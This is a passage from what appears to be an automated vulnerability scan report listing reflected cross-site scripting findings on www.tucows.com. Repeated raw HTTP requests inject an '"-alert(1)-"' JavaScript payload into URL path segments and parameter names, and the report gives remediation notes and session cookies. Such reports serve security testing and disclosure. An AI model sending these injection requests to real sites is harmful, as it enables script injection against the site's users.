The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a833"-alert(1)-"f1b3a80e89c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets5a833"-alert(1)-"f1b3a80e89c/includes/js/show_layer.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:28 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be914"-alert(1)-"d7583b93b1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesbe914"-alert(1)-"d7583b93b1f/js/show_layer.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:38 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 254cc"-alert(1)-"7ef9881c0ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js254cc"-alert(1)-"7ef9881c0ed/show_layer.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:50 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aae9e"-alert(1)-"0ee85bcbea6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/show_layer.jsaae9e"-alert(1)-"0ee85bcbea6 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:59 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.273. http://www.tucows.com/images/newassets/includes/js/show_layer.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/show_layer.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38f6"-alert(1)-"339c2aebf39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/show_layer.js?b38f6"-alert(1)-"339c2aebf39=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:06 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b50"-alert(1)-"b444dbcbd88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesf3b50"-alert(1)-"b444dbcbd88/newassets/includes/js/signupin.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:56 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d53eb"-alert(1)-"62bf072695 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsd53eb"-alert(1)-"62bf072695/includes/js/signupin.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:07 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c81a"-alert(1)-"2b1a48bb558 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes3c81a"-alert(1)-"2b1a48bb558/js/signupin.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:21 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8017"-alert(1)-"b67c8ffcb4e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/jse8017"-alert(1)-"b67c8ffcb4e/signupin.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:31 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6806a"-alert(1)-"96913118ea0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/signupin.js6806a"-alert(1)-"96913118ea0 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:41 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.279. http://www.tucows.com/images/newassets/includes/js/signupin.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/signupin.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12dab"-alert(1)-"167442f74b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/signupin.js?12dab"-alert(1)-"167442f74b4=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:35 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e30d"-alert(1)-"7ba0537e045 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images8e30d"-alert(1)-"7ba0537e045/newassets/includes/js/x_core.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:23 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 189cd"-alert(1)-"ae1dffd01f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets189cd"-alert(1)-"ae1dffd01f2/includes/js/x_core.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
